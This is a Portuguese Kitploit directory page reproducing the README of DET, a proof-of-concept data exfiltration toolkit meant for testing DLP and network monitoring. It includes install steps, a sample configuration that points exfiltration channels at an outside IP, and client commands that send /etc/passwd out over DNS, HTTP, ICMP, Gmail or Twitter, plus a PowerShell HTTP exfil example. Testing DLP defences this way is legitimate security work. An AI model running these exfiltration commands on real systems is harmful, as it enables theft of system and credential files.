Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
DET — (extensível) Data Exfiltration Toolkit (DET) | Kitploit
Ferramentas/GitHubGitHub/sensepost/det
Ferramentas de Criptografia/DescriptografiaExfiltração de DadosSegurança de RedeTestes de PenetraçãoRed TeamingAnálise de DNS
GitHubsensepost/det

DET

(extensível) Data Exfiltration Toolkit (DET)

Ver Repositório
821190há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

DET (extensível) Toolkit de Exfiltração de Dados

=======

DET (é fornecido COMO ESTÁ), é uma prova de conceito para realizar Exfiltração de Dados usando um ou vários canais ao mesmo tempo.

Esta é uma Prova de Conceito com o objetivo de identificar possíveis falhas de DLP. Isto nunca deve ser usado para exfiltrar dados sensíveis/em produção (por exemplo, numa avaliação)

A ideia foi criar um toolkit genérico para conectar qualquer tipo de protocolo/serviço para testar a configuração de soluções implementadas de Monitoramento de Rede e Prevenção de Vazamento de Dados (DLP), contra diferentes técnicas de exfiltração de dados.

O repositório principal foi movido para aqui.

Slides

DET foi apresentado no BSides Ljubljana no dia 9 de Março de 2016 e os slides estarão disponíveis aqui. Os slides estão disponíveis aqui.

Exemplo de uso (plugin ICMP)

Lado do servidor:

asciicast

Lado do cliente:

asciicast

Uso combinando dois canais (Gmail/Twitter)

Lado do servidor:

asciicast

Lado do cliente:

asciicast

Instalação

Clone o repositório:

root@kitploit:~
git clone https://github.com/sensepost/DET.git

Depois:

root@kitploit:~
pip install -r requirements.txt --user

Configuração

Para usar o DET, você precisará configurá-lo e adicionar suas próprias configurações (ex.: SMTP/IMAP, senha de criptografia AES256 e assim por diante). Um arquivo de exemplo de configuração foi fornecido e é chamado: config-sample.json

root@kitploit:~
{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "[email protected]",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

Uso

Uso de ajuda

root@kitploit:~
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Lado do servidor:

Para carregar todos os plugins:

root@kitploit:~
python det.py -L -c ./config.json

Para carregar apenas os módulos twitter e gmail:

root@kitploit:~
python det.py -L -c ./config.json -p twitter,gmail

Para carregar todos os plugins e excluir DNS:

root@kitploit:~
python det.py -L -c ./config.json -e dns

Lado do cliente:

Para carregar todos os plugins:

root@kitploit:~
python det.py -c ./config.json -f /etc/passwd

Para carregar apenas os módulos twitter e gmail:

root@kitploit:~
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

Para carregar todos os plugins e excluir DNS:

root@kitploit:~
python det.py -c ./config.json -e dns -f /etc/passwd

E no PowerShell (módulo HTTP):

root@kitploit:~
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Módulos

Até agora, o DET suporta vários protocolos, listados aqui:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (ex.: Gmail)
  • Raw TCP
  • Implementação PowerShell (HTTP, DNS, ICMP, SMTP (usado com Gmail))

E outros "serviços":

  • Google Docs (Não autenticado)
  • Twitter (Mensagens Diretas)

Módulos experimentais

Até agora, estou ocupado implementando novos módulos que estão quase prontos para lançamento, incluindo:

  • Skype (95% concluído)
  • Tor (80% concluído)
  • Github (30/40% concluído)

Roteiro

  • Adicionar criptografia adequada (ex.: AES-256) Graças a ryanohoro
  • Compressão (extremamente importante!) Graças a chokepoint
  • Ofuscação adequada de dados e integração do Cloakify Toolset
  • Módulos FTP, FlickR LSB Steganography e Youtube

Referências

Algumas referências/creditos muito legais para pessoas que me inspiraram com seus projetos:

  • https://github.com/nullbind/Powershellery/ de Nullbind.
  • https://github.com/ytisf/PyExfil, verdadeiramente fantástico.
  • https://github.com/m57/dnsteal de m57.
  • https://github.com/3nc0d3r/NaishoDeNusumu de 3nc0d3r.
  • https://github.com/glennzw/exphil de Glenn Wilkinson.
  • WebExfile de Saif El-Sherei

Contato/Contribuição

Você pode me encontrar no Twitter @PaulWebSec. Sinta-se à vontade se quiser contribuir, clonar, fazer fork, enviar seu PR e assim por diante.

Licença

DET está licenciado sob uma Licença MIT. Permissões além do escopo desta licença podem estar disponíveis em [email protected]

Baixar ferramenta